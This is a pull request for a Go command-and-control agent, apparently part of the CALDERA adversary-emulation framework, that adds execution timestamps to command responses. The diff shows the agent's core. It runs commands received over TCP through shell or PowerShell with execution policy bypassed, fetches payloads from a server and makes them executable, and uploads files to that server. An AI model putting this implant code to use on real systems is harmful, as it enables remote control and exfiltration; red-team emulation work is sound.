### PR TITLE
[VIRTS-2255] Agents report command execution time

### DIFF
--- a/shells/commands/commands.go
+++ b/shells/commands/commands.go
@@ -11,105 +11,112 @@ import (
 	"os/exec"
 	"strings"
 	"bytes"
+	"time"
 	"mime/multipart"
  )
 
- //RunCommand executes a given command
- func RunCommand(message string, httpServer string, profile map[string]interface{}) ([]byte, int) {
-   if strings.HasPrefix(message, "cd") {
-      pieces := strings.Split(message, "cd")
-      bites := changeDirectory(pieces[1])
-      return bites, 0
-   } else if (strings.HasPrefix(message, "download")) {
-      pieces := strings.Split(message, "download")
-      go download(httpServer, pieces[1])
-      return []byte("Download initiated\n"), 0
-   } else if (strings.HasPrefix(message, "upload")) {
-      pieces := strings.Split(message, "upload")
-      go upload(httpServer, pieces[1])
-      return []byte("Upload initiated\n"), 0
-   } else {
-      bites, status := execute(message, strings.Split(reflect.ValueOf(profile["executors"]).String(), ",")[0])
-      return bites, status
-   }
+//RunCommand executes a given command
+func RunCommand(message string, httpServer string, profile map[string]interface{}) ([]byte, int, time.Time) {
+    if strings.HasPrefix(message, "cd") {
+        pieces := strings.Split(message, "cd")
+        bites, executionTimestamp := changeDirectory(pieces[1])
+        return bites, 0, executionTimestamp
+    } else if (strings.HasPrefix(message, "download")) {
+        pieces := strings.Split(message, "download")
+        go download(httpServer, pieces[1])
+        return []byte("Download initiated\n"), 0, time.Now()
+    } else if (strings.HasPrefix(message, "upload")) {
+        pieces := strings.Split(message, "upload")
+        go upload(httpServer, pieces[1])
+        return []byte("Upload initiated\n"), 0, time.Now()
+    } else {
+        bites, status, executionTimestamp := execute(message, strings.Split(reflect.ValueOf(profile["executors"]).String(), ",")[0])
+        return bites, status, executionTimestamp
+    }
 }
 
- func execute(command string, executor string) ([]byte, int) {
-	var bites []byte
-	var error error
-	var status int
-	if runtime.GOOS == "windows" {
-	    if executor == "cmd" {
-	    	bites, error = exec.Command("cmd.exe", "/c", command).Output()
-	    } else {
-	    	bites, error = exec.Command("powershell.exe", "-ExecutionPolicy", "Bypass", "-C", command).Output()
-	    }
-	} else {
-	   bites, error = exec.Command("sh", "-c", command).Output()
+func execute(command string, executor string) ([]byte, int, time.Time) {
+    var bites []byte
+    var error error
+    var status int
+    var executionTimestamp time.Time
+    if runtime.GOOS == "windows" {
+        if executor == "cmd" {
+            executionTimestamp = time.Now()
+            bites, error = exec.Command("cmd.exe", "/c", command).Output()
+        } else {
+            executionTimestamp = time.Now()
+            bites, error = exec.Command("powershell.exe", "-ExecutionPolicy", "Bypass", "-C", command).Output()
+        }
+    } else {
+        executionTimestamp = time.Now()
+        bites, error = exec.Command("sh", "-c", command).Output()
     }
     if error != nil {
-	   bites = []byte(string(error.Error()))
-	   status = 1
+        executionTimestamp = time.Now()
+        bites = []byte(string(error.Error()))
+        status = 1
 	}
-	return []byte(fmt.Sprintf("%s%s", bites, "\n")), status
+	return []byte(fmt.Sprintf("%s%s", bites, "\n")), status, executionTimestamp
 }
 
-func changeDirectory(target string) []byte {
-	os.Chdir(strings.TrimSpace(target))
-	return []byte(" ")
+func changeDirectory(target string) ([]byte, time.Time) {
+    executionTimestamp := time.Now()
+    os.Chdir(strings.TrimSpace(target))
+    return []byte(" "), executionTimestamp
 }
 
 func download(server string, file string) []byte {
 	file = strings.TrimSpace(file)
 	cwd, _ := os.Getwd()
 	location := filepath.Join(cwd, file)
-	
+
     if len(file) > 0 {
-       fmt.Println(fmt.Sprintf("[*] Downloading new payload: %s", file))
-       address := fmt.Sprintf("%s/file/download", server)
-       req, _ := http.NewRequest("POST", address, nil)
-       req.Header.Set("file", file)
-	   req.Header.Set("platform", string(runtime.GOOS))
-       client := &http.Client{}
-       resp, err := client.Do(req)
-       if err == nil {
-          dst, _ := os.Create(location)
-          defer dst.Close()
-		  io.Copy(dst, resp.Body)
-		  os.Chmod(location, 777)
-       }
-	}
-	return []byte(" ")
+        fmt.Println(fmt.Sprintf("[*] Downloading new payload: %s", file))
+        address := fmt.Sprintf("%s/file/download", server)
+        req, _ := http.NewRequest("POST", address, nil)
+        req.Header.Set("file", file)
+        req.Header.Set("platform", string(runtime.GOOS))
+        client := &http.Client{}
+        resp, err := client.Do(req)
+        if err == nil {
+            dst, _ := os.Create(location)
+            defer dst.Close()
+            io.Copy(dst, resp.Body)
+            os.Chmod(location, 777)
+        }
+    }
+    return []byte(" ")
 }
 
 func upload(server string, file string) []byte {
-	file = strings.TrimSpace(file)
-	fmt.Println(fmt.Sprintf("[*] Uploading file %s", file))
-	address := fmt.Sprintf("%s/file/upload", server)
+    file = strings.TrimSpace(file)
+    fmt.Println(fmt.Sprintf("[*] Uploading file %s", file))
+    address := fmt.Sprintf("%s/file/upload", server)
 
-	bodyBuf := &bytes.Buffer{}
+    bodyBuf := &bytes.Buffer{}
     bodyWriter := multipart.NewWriter(bodyBuf)
 
     fileWriter, _ := bodyWriter.CreateFormFile("file", file)
     handler, err := os.Open(file)
     if err != nil {
-		fmt.Println("Error opening file")
-		return []byte(" ")
+        fmt.Println("Error opening file")
+        return []byte(" ")
     }
     defer handler.Close()
     io.Copy(fileWriter, handler)
     contentType := bodyWriter.FormDataContentType()
     bodyWriter.Close()
 
-	req, _ := http.NewRequest("POST", address, bodyBuf)
-	req.Header.Set("Content-Type", contentType)
-	client := &http.Client{}
-	resp, err := client.Do(req)
+    req, _ := http.NewRequest("POST", address, bodyBuf)
+    req.Header.Set("Content-Type", contentType)
+    client := &http.Client{}
+    resp, err := client.Do(req)
 
-	if err != nil {
-		fmt.Println("Error making request")
-		return []byte(" ")
-	}
+    if err != nil {
+        fmt.Println("Error making request")
+        return []byte(" ")
+    }
     resp.Body.Close()
     return []byte(" ")
 }

--- a/shells/sockets/rawtcp.go
+++ b/shells/sockets/rawtcp.go
@@ -10,6 +10,7 @@ import (
 	"encoding/json"
 
 	"../commands"
+	"../util"
 	"../output"
 )
 
@@ -39,12 +40,13 @@ func listen(conn net.Conn, profile map[string]interface{}, server string) {
     scanner := bufio.NewScanner(conn)
     for scanner.Scan() {
         message := scanner.Text()
-		bites, status := commands.RunCommand(strings.TrimSpace(message), server, profile)
+		bites, status, commandTimestamp := commands.RunCommand(strings.TrimSpace(message), server, profile)
 		pwd, _ := os.Getwd()
 		response := make(map[string]interface{})
 		response["response"] = string(bites)
 		response["status"] = status
 		response["pwd"] = pwd
+		response["agent_reported_time"] = util.GetFormattedTimestamp(commandTimestamp, "2006-01-02 03:04:05")
 		jdata, _ := json.Marshal(response)
 		conn.Write(jdata)
     }

--- a/shells/util/executors.go
+++ b/shells/util/executors.go
@@ -2,6 +2,7 @@ package util
 
 import (
 	"fmt"
+	"time"
 	"os/exec"
 	"strings"
 )
@@ -52,4 +53,8 @@ func DetermineExecutors(executors []string, platform string, arch string) []stri
 func checkIfExecutorAvailable(executor string) bool {
 	_, err := exec.LookPath(executor)
 	return err == nil
+}
+
+func GetFormattedTimestamp(timestamp time.Time, dateFormat string) (string) {
+    return timestamp.Format(dateFormat)
 }


### PR DESCRIPTION
## Description

Implements the agent change for mitre/caldera#2163

FYI, the files I was working with seemed to have combinations of tabs/spaces (hence why it looks like many changes).

## Type of change

- [X] New feature (non-breaking change which adds functionality)
- [X] This change requires a documentation update

## How Has This Been Tested?

Manually deploy this agent to a machine and perform an operation. The event logs or full report should reflect a new field `agent_reported_time`.

## Checklist:

- [X] My code follows the style guidelines of this project
- [X] I have performed a self-review of my own code
- [X] I have made corresponding changes to the documentation
- [ ] I have added tests that prove my fix is effective or that my feature works